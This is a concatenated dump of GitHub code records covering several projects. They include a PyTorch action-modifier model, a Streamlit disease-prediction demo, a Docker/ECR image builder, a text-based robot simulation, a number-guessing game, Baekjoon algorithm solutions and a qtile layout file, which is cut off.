SolarGenerationMissingHandler().handle(data=df)\n","repo_name":"BlooAM/Day-ahead-prices","sub_path":"src/data_preprocessor/missing_handlers/solar_generation.py","file_name":"solar_generation.py","file_ext":"py","file_size_in_byte":1635,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"18280856650","text":"import math\n\nimport torch\nimport torch.nn as nn\nimport torch.nn.functional as F\n\ndef load_word_embeddings(emb_file, vocab):\n vocab = [word.lower() for word in vocab]\n\n embeddings = {}\n with open(emb_file, 'r') as f:\n for line in f:\n line = line.strip().split(' ')\n word_vec = torch.FloatTensor(list(map(float, line[1:])))\n embeddings[line[0]] = word_vec\n embeddings = [embeddings[word] for word in vocab]\n embeddings = torch.stack(embeddings)\n print('loaded word embeddings')\n return embeddings\n\nclass MLP(nn.Module):\n def __init__(self, inp_dim, out_dim, num_layers=1, relu=True, bias=True):\n super(MLP, self).__init__()\n network = []\n for i in range(num_layers-1):\n network.append(nn.Linear(inp_dim, inp_dim, bias=bias))\n network.append(nn.ReLU(True))\n network.append(nn.Linear(inp_dim, out_dim, bias=bias))\n if relu:\n network.append(nn.ReLU(True))\n\n self.network = nn.Sequential(*network)\n\n def forward(self, x):\n output = self.network(x)\n return output\n\nclass SDPAttention(nn.Module):\n def __init__(self, d_model, d_k, d_v, emb_dim, heads=1, dropout=0.1):\n super(SDPAttention, self).__init__()\n self.d_k = int(d_k/heads)\n self.d_v = int(d_v/heads)\n d_model = int(d_model/heads)\n self.q_linear = nn.Linear(int(emb_dim/heads), self.d_k)\n self.k_linear = nn.Linear(d_model, self.d_k)\n self.v_linear = nn.Linear(d_model, self.d_v)\n self.h = heads\n\n self.dropout = nn.Dropout(dropout)\n\n self.out = nn.Linear(heads*self.d_v, emb_dim)\n\n def attention(self, q, k, v, dropout=None):\n scores = torch.matmul(q, k.transpose(-2, -1)) / math.sqrt(self.d_k)\n scores = F.softmax(scores, dim=-1)\n if dropout is not None:\n scores = dropout(scores)\n output = torch.matmul(scores, v)\n output = output.reshape(output.shape[0], output.shape[1], output.shape[-1])\n return output, scores\n\n def forward(self, features, queries):\n bs = queries.shape[0]\n q = self.q_linear(queries.view(bs, -1, self.h, int(queries.shape[-1]/self.h)))\n k = self.k_linear(features.view(bs, -1, self.h, int(features.shape[-1]/self.h)))\n v = self.v_linear(features.view(bs, -1, self.h, int(features.shape[-1]/self.h)))\n q = q.transpose(1,2)\n k = k.transpose(1,2)\n v = v.transpose(1,2)\n\n output, scores = self.attention(q, k, v, self.dropout)\n concat = output.transpose(1,2).contiguous().view(bs, self.d_v*self.h)\n output = self.out(concat)\n return output, scores\n\nclass ActionModifiers(nn.Module):\n def __init__(self, dset, args):\n super(ActionModifiers, self).__init__()\n if args.temporal_agg == 'sdp':\n self.video_embedder = SDPAttention(dset.feature_dim, args.emb_dim, args.emb_dim, args.emb_dim,\n heads=4)\n else:\n self.video_embedder = MLP(dset.feature_dim, args.emb_dim)\n\n self.action_modifiers = nn.ParameterList([nn.Parameter(torch.eye(args.emb_dim))\n for _ in range(len(dset.adverbs))])\n self.action_embedder = nn.Embedding(len(dset.actions), args.emb_dim)\n\n if args.glove_init:\n pretrained_weight = load_word_embeddings('data/glove.6B.300d.txt', dset.actions)\n self.action_embedder.weight.data.copy_(pretrained_weight)\n\n for param in self.action_embedder.parameters():\n param.requires_grad = False\n\n self.margin = 0.5\n self.transformer = False\n if args.temporal_agg == 'sdp':\n self.transformer = True\n\n self.compare_metric = lambda vid_feats, act_adv_embed: -F.pairwise_distance(vid_feats, act_adv_embed)\n self.dset = dset\n\n ## precompute validation pairs\n adverbs, actions = zip(*self.dset.pairs)\n self.val_adverbs = torch.LongTensor([dset.adverb2idx[adv.strip()] for adv in adverbs]).cuda()\n self.val_actions = torch.LongTensor([dset.action2idx[act.strip()] for act in actions]).cuda()\n\n def apply_modifiers(self, modifiers, embedding):\n output = torch.bmm(modifiers, embedding.unsqueeze(2)).squeeze(2)\n output = F.relu(output)\n return output\n\n def train_forward(self, x):\n features, adverbs, actions = x[0], x[1], x[2]\n neg_adverbs, neg_actions = x[3], x[4]\n action_embedding = self.action_embedder(actions)\n neg_action_embedding = self.action_embedder(neg_actions)\n if self.transformer:\n video_embedding, attention_weights = self.video_embedder(features, action_embedding)\n else:\n video_embedding = self.video_embedder(features)\n attention_weights = None\n\n pos_modifiers = torch.stack([self.action_modifiers[adv.item()] for adv in adverbs])\n positive = self.apply_modifiers(pos_modifiers, action_embedding)\n negative_act = self.apply_modifiers(pos_modifiers, neg_action_embedding)\n\n neg_modifiers = torch.stack([self.action_modifiers[adv.item()] for adv in neg_adverbs])\n negative_adv = self.apply_modifiers(neg_modifiers, action_embedding)\n\n loss_triplet_act = F.triplet_margin_loss(video_embedding, positive, negative_act, margin=self.margin)\n loss_triplet_adv = F.triplet_margin_loss(video_embedding, positive, negative_adv, margin=self.margin)\n loss = [loss_triplet_act, loss_triplet_adv]\n\n return loss, None, attention_weights, video_embedding\n\n def val_forward(self, x):\n features = x[0]\n actions = x[2]\n batch_size = features.shape[0]\n\n if self.transformer:\n action_gt_embedding = self.action_embedder(actions)\n video_embedding, attention_weights = self.video_embedder(features, action_gt_embedding)\n else:\n video_embedding = self.video_embedder(features)\n attention_weights = None\n action_embedding = self.action_embedder(self.val_actions)\n modifiers = torch.stack([self.action_modifiers[adv.item()] for adv in self.val_adverbs])\n action_adverb_embeddings = self.apply_modifiers(modifiers, action_embedding)\n\n scores = {}\n for i, (adverb, action) in enumerate(self.dset.pairs):\n pair_embedding = action_adverb_embeddings[i, None].expand(batch_size, action_adverb_embeddings.size(1))\n score = self.compare_metric(video_embedding, pair_embedding)\n scores[(adverb, action)] = score\n return None, scores, attention_weights, video_embedding\n\n def forward(self, x):\n if self.training:\n loss, pred, att, vid_feats = self.train_forward(x)\n else:\n with torch.no_grad():\n loss, pred, att, vid_feats = self.val_forward(x)\n return loss, pred, att, vid_feats\n\nclass Evaluator:\n def __init__(self, dset, model):\n self.dset = dset\n pairs = [(dset.adverb2idx[adv.strip()], dset.action2idx[act]) for adv, act in dset.pairs]\n self.pairs = torch.LongTensor(pairs)\n\n ## mask over pairs for ground-truth action given in testing\n action_gt_mask = []\n for _act in dset.actions:\n mask = [1 if _act==act else 0 for adv, act in dset.pairs]\n action_gt_mask.append(torch.BoolTensor(mask))\n self.action_gt_mask = torch.stack(action_gt_mask, 0)\n\n antonym_mask = []\n for _adv in dset.adverbs:\n mask = [1 if (_adv==adv or _adv==dset.antonyms[adv]) else 0 for adv, act in dset.pairs]\n antonym_mask.append(torch.BoolTensor(mask))\n self.antonym_mask = torch.stack(antonym_mask, 0)\n\n def get_gt_action_scores(self, scores, action_gt):\n mask = self.action_gt_mask[action_gt]\n action_gt_scores = scores.clone()\n action_gt_scores[~mask] = -1e10\n return action_gt_scores\n\n def get_antonym_scores(self, scores, adverb_gt):\n mask = self.antonym_mask[adverb_gt]\n antonym_scores = scores.clone()\n antonym_scores[~mask] = -1e10\n return antonym_scores\n\n def get_gt_action_antonym_scores(self, scores, action_gt, adverb_gt):\n mask = self.antonym_mask[adverb_gt] & self.action_gt_mask[action_gt]\n action_gt_antonym_scores = scores.clone()\n action_gt_antonym_scores[~mask] = -1e10\n return action_gt_antonym_scores\n\n def get_scores(self, scores, action_gt, adverb_gt):\n scores = {k:v.cpu() for k, v in scores.items()}\n action_gt = action_gt.cpu()\n\n scores = torch.stack([scores[(adv, act)] for adv, act in self.dset.pairs], 1)\n action_gt_scores = self.get_gt_action_scores(scores, action_gt)\n antonym_action_gt_scores = self.get_gt_action_antonym_scores(scores, action_gt, adverb_gt)\n return scores, action_gt_scores, antonym_action_gt_scores\n\n \n","repo_name":"hazeld/action-modifiers","sub_path":"model.py","file_name":"model.py","file_ext":"py","file_size_in_byte":8949,"program_lang":"python","lang":"en","doc_type":"code","stars":21,"dataset":"github-code","pt":"53"} +{"seq_id":"19748700879","text":"from threading import Lock\nfrom typing import Optional\nimport warnings\n\nwarnings.warn(\n \"the globals_manager module is deprecated\", DeprecationWarning, stacklevel=2\n)\n\n__GLOBALS_DICT = dict()\n__LOCK_TIMEOUT = 50\n__GLOBALS_LOCK = Lock()\n\n\ndef get_global(global_param_id: int, lock: bool = False):\n global __LOCK_TIMEOUT, __GLOBALS_DICT\n if lock:\n __GLOBALS_LOCK.acquire(timeout=__LOCK_TIMEOUT)\n global_param = __GLOBALS_DICT.get(global_param_id)\n if lock:\n __GLOBALS_LOCK.release()\n return global_param\n\n\ndef update_global(global_param_id: int, parameter: any, lock: bool = False):\n global __LOCK_TIMEOUT, __GLOBALS_DICT\n if lock:\n __GLOBALS_LOCK.acquire(timeout=__LOCK_TIMEOUT)\n __GLOBALS_DICT[global_param_id] = parameter\n if lock:\n __GLOBALS_LOCK.release()\n\n\ndef lock_global_pool(\n blocking: Optional[bool] = None, timeout: Optional[float] = None\n) -> bool:\n \"\"\"Lock the global objects. This is important if the values are changed. Don't forget to unlock\n the pool after finishing work with the globals!\n :param timeout_seconds: Attempt to lock for this many second. Default value -1 blocks\n permanently until lock is released.\n :return: Returns whether lock was locked or not.\n \"\"\"\n global __LOCK_TIMEOUT, __GLOBALS_LOCK\n if blocking is None:\n blocking = True\n if timeout is None:\n timeout = __LOCK_TIMEOUT\n return __GLOBALS_LOCK.acquire(blocking=blocking, timeout=timeout)\n\n\ndef unlock_global_pool():\n global __GLOBALS_LOCK\n \"\"\"Releases the lock so other objects can use the global pool as well\"\"\"\n return __GLOBALS_LOCK.release()\n\n\ndef set_lock_timeout(timeout: float):\n global __LOCK_TIMEOUT\n \"\"\"Set the timeout for the globals manager lock which can ensure thread-safety\"\"\"\n __LOCK_TIMEOUT = timeout\n","repo_name":"robamu-org/tmtccmd","sub_path":"tmtccmd/core/globals_manager.py","file_name":"globals_manager.py","file_ext":"py","file_size_in_byte":1830,"program_lang":"python","lang":"en","doc_type":"code","stars":12,"dataset":"github-code","pt":"53"} +{"seq_id":"73030015529","text":"import sys\nfrom itertools import combinations\ninput = sys.stdin.readline\n\nwhile True:\n tmp = list(map(int, input().split()))\n k = tmp.pop(0)\n\n if k == 0:\n break\n\n combi = combinations(tmp, 6)\n\n for i in combi:\n for j in i:\n print(j, end=' ')\n print()\n\n print()","repo_name":"CHOSIYEON/Algorithms","sub_path":"BAEKJOON/Brute Force/6603.py","file_name":"6603.py","file_ext":"py","file_size_in_byte":310,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"71275429927","text":"# -*- coding: utf-8 -*-\r\n\"\"\"\r\nCreated on Fri Mar 24 19:58:20 2023\r\n\r\n@author: Ishita\r\n\"\"\"\r\n\r\nimport pickle\r\nimport streamlit as st\r\n\r\nfrom streamlit_option_menu import option_menu\r\n\r\n#loading models\r\ndiabetesmodel=pickle.load(open(\"C:/Users/Dell/Desktop/Multiple Prediction system/diabetes.sav\",'rb'))\r\n\r\nheartdiseasemodel=pickle.load(open(\"C:/Users/Dell/Desktop/Multiple Prediction system/heartmodel.sav\",'rb'))\r\n\r\nbreastcancermodel=pickle.load(open(\"C:/Users/Dell/Desktop/Multiple Prediction system/breast.sav\",'rb'))\r\n\r\n\r\n#sidebar customization for navigation purpose\r\n\r\nwith st.sidebar:\r\n selected=option_menu('MULTIPLE DISEASE PREDICTION TECHNIQUE',\r\n ['DIABETES PREDICTION','HEART DISEASE PREDICTION', 'TYPE OF BREAST CANCER PREDICTION'\r\n ],\r\n icons=['activity','heart','person'],\r\n default_index=0)\r\n\r\n# Diabetes Prediction Page\r\nif (selected==\"DIABETES PREDICTION\"):\r\n \r\n # page title\r\n st.title('Diabetes Prediction using SVM')\r\n col1, col2, col3 = st.columns(3)\r\n with col1:\r\n Pregnancies = st.text_input('Number of Pregnancies')\r\n with col2:\r\n Glucose = st.text_input('Glucose Level')\r\n with col3:\r\n BloodPressure = st.text_input('Blood Pressure value')\r\n with col1:\r\n SkinThickness = st.text_input('Skin Thickness value')\r\n with col2:\r\n Insulin = st.text_input('Insulin Level')\r\n with col3:\r\n BMI = st.text_input('BMI value')\r\n with col1:\r\n DiabetesPedigreeFunction = st.text_input('Diabetes Pedigree Function value')\r\n with col2:\r\n Age = st.text_input('Age of the Person')\r\n \r\n \r\n # code for Prediction\r\n diab_diagnosis = ''\r\n \r\n # creating a button for Prediction\r\n \r\n if st.button('Diabetes Test Result'):\r\n diab_prediction = diabetesmodel.predict([[Pregnancies, Glucose, BloodPressure, SkinThickness, Insulin, BMI, DiabetesPedigreeFunction, Age]])\r\n \r\n if (diab_prediction[0] == 1):\r\n diab_diagnosis = 'The person is diabetic'\r\n else:\r\n diab_diagnosis = 'The person is not diabetic'\r\n \r\n st.success(diab_diagnosis)\r\n\r\n\r\n\r\n\r\n# Heart Disease Prediction Page\r\nif (selected == 'HEART DISEASE PREDICTION'):\r\n \r\n # page title\r\n st.title('Heart Disease Prediction using Logistic Regression')\r\n \r\n col1, col2, col3 = st.columns(3)\r\n \r\n with col1:\r\n age = st.text_input('Age')\r\n \r\n with col2:\r\n sex = st.text_input('Sex')\r\n \r\n with col3:\r\n cp = st.text_input('Chest Pain types')\r\n \r\n with col1:\r\n trestbps = st.text_input('Resting Blood Pressure')\r\n \r\n with col2:\r\n chol = st.text_input('Serum Cholestoral in mg/dl')\r\n \r\n with col3:\r\n fbs = st.text_input('Fasting Blood Sugar > 120 mg/dl')\r\n \r\n with col1:\r\n restecg = st.text_input('Resting Electrocardiographic results')\r\n \r\n with col2:\r\n thalach = st.text_input('Maximum Heart Rate achieved')\r\n \r\n with col3:\r\n exang = st.text_input('Exercise Induced Angina')\r\n \r\n with col1:\r\n oldpeak = st.text_input('ST depression induced by exercise')\r\n \r\n with col2:\r\n slope = st.text_input('Slope of the peak exercise ST segment')\r\n \r\n with col3:\r\n ca = st.text_input('Major vessels colored by flourosopy')\r\n \r\n with col1:\r\n thal = st.text_input('thal: 0 = normal; 1 = fixed defect; 2 = reversable defect')\r\n \r\n \r\n \r\n \r\n # code for Prediction\r\n heart_diagnosis = ''\r\n \r\n # creating a button for Prediction\r\n \r\n if st.button('Heart Disease Test Result'):\r\n heart_prediction = heartdiseasemodel.predict([[age, sex, cp, trestbps, chol, fbs, restecg,thalach,exang,oldpeak,slope,ca,thal]]) \r\n \r\n if (heart_prediction[0] == 1):\r\n heart_diagnosis = 'The person is having heart disease'\r\n else:\r\n heart_diagnosis = 'The person does not have any heart disease'\r\n \r\n st.success(heart_diagnosis)\r\n \r\nif (selected=='TYPE OF BREAST CANCER PREDICTION'):\r\n #title setting\r\n st.title(\"Type OF Breast Cancer Prediction using Random Forest\")\r\n col1, col2, col3 = st.columns(3)\r\n with col1:\r\n radius_mean=st.text_input(\"Enter Radius Mean\")\r\n with col2:\r\n texture_mean=st.text_input(\"Enter Texture Mean\")\r\n with col3:\r\n perimeter_mean=st.text_input(\"Enter Perimeter Mean\")\r\n with col1:\r\n area_mean=st.text_input(\"Enter Area Mean\")\r\n with col2:\r\n smoothness_mean=st.text_input(\"Enter Smoothness Mean\")\r\n with col3:\r\n concavity_mean=st.text_input(\"Enter Concavity Mean\")\r\n with col1:\r\n concavepoints_mean=st.text_input(\"Enter Concave Points Mean\")\r\n with col2:\r\n symmetry_mean=st.text_input(\"Enter Symmetry Mean\")\r\n with col3:\r\n fractal_dimension_mean=st.text_input(\"Enter Fractal dimension Mean\")\r\n \r\n # code for Prediction\r\n breast_diagnosis = '' \r\n # creating a button for Prediction\r\n \r\n if st.button('Breast Cancer Type Test Result'):\r\n cancer_prediction = breastcancermodel.predict([[radius_mean,texture_mean,perimeter_mean,area_mean,smoothness_mean,concavity_mean,concavepoints_mean,symmetry_mean,fractal_dimension_mean]]) \r\n \r\n \r\n if (cancer_prediction[0] == 1):\r\n breast_diagnosis = \"The Pateint is suffering from Malignant Tumor(which can spread throughout the whole body via blood)\"\r\n else:\r\n breast_diagnosis = \"The Patient is suffering from Benign Tumor (which spreads locally)\"\r\n \r\n st.success(breast_diagnosis)\r\n ","repo_name":"ishitabahuguna/Multiple-Disease-Prediction-system","sub_path":"MULTIPLE DISEASE PREDICTION SYSTEM.py","file_name":"MULTIPLE DISEASE PREDICTION SYSTEM.py","file_ext":"py","file_size_in_byte":5809,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"70276356648","text":"\"\"\"Robot motion simulation with simple text-based graphics\"\"\"\n# MCS 275 Spring 2021 - David Dumas\n# Used in Lecture 5 and Lecture 6\n\nfrom plane import Vector,Point\nimport bots\nimport random\nimport time\n\nwidth=60\nheight=30\n\ncurrent_bots = []\n\n# Make some wander bots\nfor i in range(5):\n P = Point(random.randint(0,width-1),random.randint(0,height-1))\n current_bots.append(bots.WanderBot(position=P))\n\n# Make some patrol bots\npatrol_directions = [ \n Vector(1,0),\n Vector(0,1),\n Vector(1,1)\n]\nfor i in range(10):\n P = Point(random.randint(0,width-1),random.randint(0,height-1))\n D = random.choice(patrol_directions)\n current_bots.append(bots.PatrolBot(position=P,direction=D,nstep=8))\n\n# Make two destruct bots\ncurrent_bots.append(bots.DestructBot(position=Point(4,4),lifetime=5))\ncurrent_bots.append(bots.DestructBot(position=Point(4,10),lifetime=15))\n\n# Symbols for the different kinds of bots\nbotsymbols = {\n bots.PatrolBot: \"P\",\n bots.DestructBot: \"D\",\n bots.WanderBot: \"W\",\n bots.Bot: \"*\"\n}\n\nprint(\"Press ENTER to begin the simulation\")\ninput()\n\nn=0\nwhile True:\n print(\"\\n\"*2*height)\n board = [ [\" \"]*width for _ in range(height) ]\n for b in current_bots:\n if not b.alive:\n continue\n elif b.position.x < 0 or b.position.x >= width:\n continue\n elif b.position.y < 0 or b.position.y >= height:\n continue\n # Mark the spot with a symbol depending on bot type\n board[b.position.y][b.position.x] = botsymbols[b.__class__]\n \n # To print the board, we'll print a lot of newlines, then\n # the board itself, and then the time indicator. We'll put those\n # into a single string to reduce the chance that part of the display\n # is updated before the whole thing is shown. This makes the\n # \"graphics\" a little more fluid.\n boardstr = \"\\n\"*3*height\n for row in board:\n boardstr+=\"\".join(row) + \"\\n\"\n boardstr += \"time={}\".format(n)\n print(boardstr,flush=True)\n time.sleep(0.2)\n\n for b in current_bots:\n b.update()\n n += 1\n","repo_name":"daviddumas/mcs275spring2021","sub_path":"samplecode/botsimulation.py","file_name":"botsimulation.py","file_ext":"py","file_size_in_byte":2079,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"74204523367","text":"import base64\nimport logging\nimport os\n\nimport boto3\nimport botocore\nimport docker\nimport yaml\n\nfrom stactools_pipelines.models.pipeline import Pipeline\n\nlogging.basicConfig(level=logging.DEBUG)\npipeline_name = os.environ[\"PIPELINE\"]\n\n\ndef build_and_push(dockerfile: str, tag: str, pipeline_id: str):\n image, build_logs = client.images.build(\n path=\"./\",\n dockerfile=dockerfile,\n tag=tag,\n buildargs={\n \"pipeline\": pipeline_id,\n },\n )\n for chunk in build_logs:\n if \"stream\" in chunk:\n for line in chunk[\"stream\"].splitlines():\n logging.debug(line)\n\n ecr_client = boto3.client(\"ecr\")\n try:\n ecr_client.create_repository(repositoryName=tag)\n except botocore.exceptions.ClientError as error:\n if error.response[\"Error\"][\"Code\"] == \"RepositoryAlreadyExistsException\":\n logging.debug(\"Repository already exists\")\n else:\n raise error\n\n ecr_credentials = ecr_client.get_authorization_token()[\"authorizationData\"][0]\n\n ecr_password = (\n base64.b64decode(ecr_credentials[\"authorizationToken\"])\n .replace(b\"AWS:\", b\"\")\n .decode(\"utf-8\")\n )\n\n ecr_url = ecr_credentials[\"proxyEndpoint\"]\n client.login(username=\"AWS\", password=ecr_password, registry=ecr_url)\n ecr_repo_name = \"{}/{}\".format(ecr_url.replace(\"https://\", \"\"), tag)\n image.tag(ecr_repo_name, tag=\"latest\")\n push_log = client.images.push(ecr_repo_name, tag=\"latest\")\n logging.debug(push_log)\n\n\nwith open(f\"./stactools_pipelines/pipelines/{pipeline_name}/config.yaml\") as f:\n config = yaml.safe_load(f)\n pipeline = Pipeline(**config)\n\n client = docker.from_env()\n if pipeline.compute == \"awslambda\":\n dockerfile = \"./lambda.collection.Dockerfile\"\n tag = f\"{pipeline.id}-collection\"\n build_and_push(dockerfile, tag, pipeline.id)\n\n dockerfile = \"./lambda.Dockerfile\"\n tag = pipeline.id\n build_and_push(dockerfile, tag, pipeline.id)\n\n if pipeline.inventory_location:\n dockerfile = \"./lambda.historic.Dockerfile\"\n tag = f\"{pipeline.id}-historic\"\n build_and_push(dockerfile, tag, pipeline.id)\n","repo_name":"developmentseed/stactools-pipelines","sub_path":"image_builder.py","file_name":"image_builder.py","file_ext":"py","file_size_in_byte":2202,"program_lang":"python","lang":"en","doc_type":"code","stars":6,"dataset":"github-code","pt":"53"} +{"seq_id":"44030190280","text":"import os\nimport argparse\nfrom tensorflow_asr.utils.env_util import setup_environment, setup_strategy\n\nlogger = setup_environment()\nimport tensorflow as tf\n\nDEFAULT_YAML = os.path.join(os.path.abspath(os.path.dirname(__file__)), \"config.yml\")\n\ntf.keras.backend.clear_session()\n\nparser = argparse.ArgumentParser(prog=\"Vocab Training with SentencePiece\")\n\nparser.add_argument(\"--config\", type=str, default=DEFAULT_YAML,\n help=\"The file path of model configuration file\")\n\nparser.add_argument(\"--devices\", type=int, nargs=\"*\", default=[0],\n help=\"Devices' ids to apply distributed training\")\n\nargs = parser.parse_args()\n\nstrategy = setup_strategy(args.devices)\n\nfrom tensorflow_asr.configs.config import Config\nfrom tensorflow_asr.featurizers.text_featurizers import SentencePieceFeaturizer\n\nconfig = Config(args.config)\n\nlogger.info(\"Generating subwords ...\")\ntext_featurizer = SentencePieceFeaturizer.build_from_corpus(\n config.decoder_config\n)\n","repo_name":"TensorSpeech/TensorFlowASR","sub_path":"scripts/generate_vocab_sentencepiece.py","file_name":"generate_vocab_sentencepiece.py","file_ext":"py","file_size_in_byte":985,"program_lang":"python","lang":"en","doc_type":"code","stars":877,"dataset":"github-code","pt":"53"} +{"seq_id":"8184670641","text":"import numpy as np\n\nimport tbv.utils.frustum_utils as frustum_utils\n\n\ndef test_get_frustum_side_normals() -> None:\n \"\"\"Ensure we can compute normals to left and right clipping planes accurately.\n\n Scenario uses a frustum with a fov of 90 degrees (PI/2 radians). Suppose\n in the egovehicle frame, the camera looks directly down the +x direction,\n from the origin.\n \"\"\"\n fov_theta = np.pi / 2\n import pdb; pdb.set_trace()\n l_normal, r_normal = frustum_utils.get_frustum_side_normals(fov_theta)\n\n # normals for left and right clipping planes point into the frustum\n gt_l_normal = np.array([1.0, -1.0]) / np.sqrt(2)\n assert np.allclose(l_normal, gt_l_normal)\n\n gt_r_normal = np.array([1.0, 1.0]) / np.sqrt(2)\n assert np.allclose(r_normal, gt_r_normal)\n\n # frustum with width 53 degrees\n # when we point in (x,y)=(2,1) direction (narrower frustum)\n fov_theta = np.deg2rad(53.13010235415598)\n l_normal, r_normal = frustum_utils.get_frustum_side_normals(fov_theta)\n\n gt_l_normal = np.array([1.0, -2.0]) / np.linalg.norm(np.array([2, 1]))\n assert np.allclose(l_normal, gt_l_normal)\n\n gt_r_normal = np.array([1.0, 2.0]) / np.linalg.norm(np.array([2, 1]))\n assert np.allclose(r_normal, gt_r_normal)\n\n\n\n# def test_get_frustum_parameters() -> None:\n# \"\"\" \"\"\"\n# log_ids = [\"allison-arkansas-wdc-new-bollards\", \"new-bike-lane-v5\"]\n\n# data_dir = \"/home/jlambert/mcd_extraction_output_dir_2020_07_17/logs\"\n# dl = SimpleArgoverseTrackingDataLoader(data_dir=data_dir, labels_dir=data_dir)\n\n# for log_id in log_ids:\n# log_calib_data = dl.get_log_calibration_data(log_id)\n\n# # for each camera frustum\n# for camera_name in RING_CAMERA_LIST:\n# logger.info(f\"On camera {camera_name}\")\n# camera_config = get_calibration_config(log_calib_data, camera_name)\n# yaw, fov = frustum_utils.get_frustum_parameters(camera_config)\n\n# if camera_name == \"ring_front_center\":\n# assert np.isclose(yaw, -0.01, atol=1)\n# assert np.isclose(fov, 85.21, atol=1)\n# if camera_name == \"ring_front_left\":\n# assert np.isclose(yaw, 45.11, atol=1)\n# assert np.isclose(fov, 101.08, atol=1)\n# if camera_name == \"ring_side_left\":\n# assert np.isclose(yaw, 99.23, atol=1)\n# assert np.isclose(fov, 101.10, atol=1)\n# if camera_name == \"ring_rear_left\":\n# assert np.isclose(yaw, 153.21, atol=1)\n# assert np.isclose(fov, 101.04, atol=1)\n# if camera_name == \"ring_rear_right\":\n# assert np.isclose(yaw, -152.99, atol=1)\n# assert np.isclose(fov, 101.14, atol=1)\n# if camera_name == \"ring_side_right\":\n# assert np.isclose(yaw, -98.97, atol=1)\n# assert np.isclose(fov, 101.14, atol=1)\n# if camera_name == \"ring_front_right\":\n# assert np.isclose(yaw, -44.99, atol=1)\n# assert np.isclose(fov, 101.10, atol=1)\n","repo_name":"johnwlambert/tbv","sub_path":"tests/utils/test_frustum_utils.py","file_name":"test_frustum_utils.py","file_ext":"py","file_size_in_byte":3094,"program_lang":"python","lang":"en","doc_type":"code","stars":63,"dataset":"github-code","pt":"53"} +{"seq_id":"2338162731","text":"import sys\nfrom itertools import combinations\n\ninput = sys.stdin.readline\n\nn, k = map(int, input().split())\n\nwords_bit = []\n# 꼭 배워야되는 알파벳\nessential = {'a', 'c', 'i', 'n', 't'}\n# 모든 단어들에서 나오는 알파벳 (essential은 제외)\nalpha = set()\n# 결과값\nresult = 0\n\nfor _ in range(n):\n # 입력받은 단어에서 essential은 빼준다.\n word = set(list(input().rstrip())) - essential\n\n # essential 단어를 제외하고 k-5개 보다 많은 단어는 절대 배우지 못하는 단어\n if(len(word) > k-5):\n continue\n\n # alpha 집합에 단어의 알파벳을 합집합으로 넣어준다.\n alpha = alpha.union(word)\n # 단어에 포함되는 알파벳은 비트로 표현\n bit = 0\n for c in word:\n bit |= (1 << ord(c)-97)\n words_bit.append(bit)\n\n# k가 5보다 작으면 essential 단어도 못배우기 때문\n# 배울수 있는 단어가 0개\nif(k < 5 or not words_bit):\n print(0)\n exit(0)\n\n# alpha 집합에 든 알파벳의 숫자와 최대로 배울수 있는 k-5중에 작은 수로 조합을 만들어준다.\nfor temp in list(combinations(alpha, min(len(alpha), k-5))):\n # 조합을 비트로 표현\n bit = 0\n # 현재 조합으로 만들 수 있는 단어의 수\n cnt = 0\n\n for c in temp:\n bit |= (1 << ord(c)-97)\n\n for wb in words_bit:\n # 현재 조합의 비트와 단어의 비트를 and연산해서 단어의 비트가 나오면 만들 수 있는 단어이다.\n if(bit & wb == wb):\n cnt += 1\n\n result = max(result, cnt)\n\nprint(result)\n","repo_name":"97DongHyeokOH/Algorithm_Study","sub_path":"BAEKJOON/Practice/비트마스킹/1062.py","file_name":"1062.py","file_ext":"py","file_size_in_byte":1587,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"4084513416","text":"#!/usr/bin/python3\n\ndef main():\n # dicionario = { 'um' : 1, 'dois' : 2, 'tres' : 3, 'quatro' : 4 }\n dicionario = dict(\n um = 1, dois = 2, tres = 3, quatro = 'quatro'\n )\n dicionario['cinco'] = 5\n \n print(dicionario)\n \n for k in dicionario:\n print(k, dicionario[k])\n \n for k in dicionario:\n print(k)\n \n for k in sorted(dicionario.keys()):\n print(k, dicionario[k]) \n \nif __name__ == \"__main__\" : main()","repo_name":"phoenixproject/python","sub_path":"Python3_CursoSon/3/dicionarios.py","file_name":"dicionarios.py","file_ext":"py","file_size_in_byte":513,"program_lang":"python","lang":"es","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"30537249914","text":"import random\n\ndef jogar():\n print(\"*********************************\")\n print(\"BEM VINDO AO JOGO DE ADIVINHAÇÃO\")\n print(\"*********************************\")\n\n numero_secreto =random.randrange(1,101) # importei essa função para gerar um numero aleatorio numero_secreto\" é uma variavel\n total_de_tentativas = 0\n pontos = 1000\n\n print(\"Escolha um nivel de dificuldade:\")\n print(\"(1)FÁCIL (2) MÉDIO (3) DIFÍCIL\")\n\n nivel = int(input(\"Defina um nivel : \"))\n\n if(nivel ==1):\n total_de_tentativas = 15\n elif(nivel ==2):\n total_de_tentativas = 10\n else:\n total_de_tentativas = 5\n\n for rodada in range(1,total_de_tentativas + 1):\n print(\"Tentativa {} de {}\".format(rodada,total_de_tentativas))\n chute_str = input(\"Digite um numero entre 1 e 100: \")\n print(\"Você digitou \", chute_str)\n chute = int(chute_str)\n\n if(chute < 1 or chute > 100 ):\n print(\"Você tem que digitar um numero de 1 a 100!\")\n continue\n\n acertou = chute == numero_secreto\n maior = chute > numero_secreto\n menor = chute < numero_secreto\n\n if(acertou):\n print(\"Voce acertou e fez {} pontos!\".format(pontos))\n break\n else:\n if(maior):\n print(\"Você errou! o numero secreto é menor \\n\")\n elif(menor):\n print(\"Você errou! o numero secreto é maior \\n\")\n pontos_perdidos = abs(numero_secreto - chute) # toda vez que chutar vai tirar os pontos com o valor do chute caso erre por exempo = 40 - 20 = 20\n pontos = pontos - pontos_perdidos\n\n print(\"FIM DO JOGO\")\n\nif(__name__ == \"__main__\"):\n jogar()\n\n\n\n\n\n\n\n\n\n\n","repo_name":"Fiacco/jogos","sub_path":"adivinhacao.py","file_name":"adivinhacao.py","file_ext":"py","file_size_in_byte":1727,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"70759852329","text":"from libqtile.layout.base import _SimpleLayoutBase\nfrom libqtile.log_utils import logger\nfrom math import sqrt, floor, ceil\nfrom itertools import repeat\n\noverrides = {\n 3: [(0, 0, 1/2, 1), 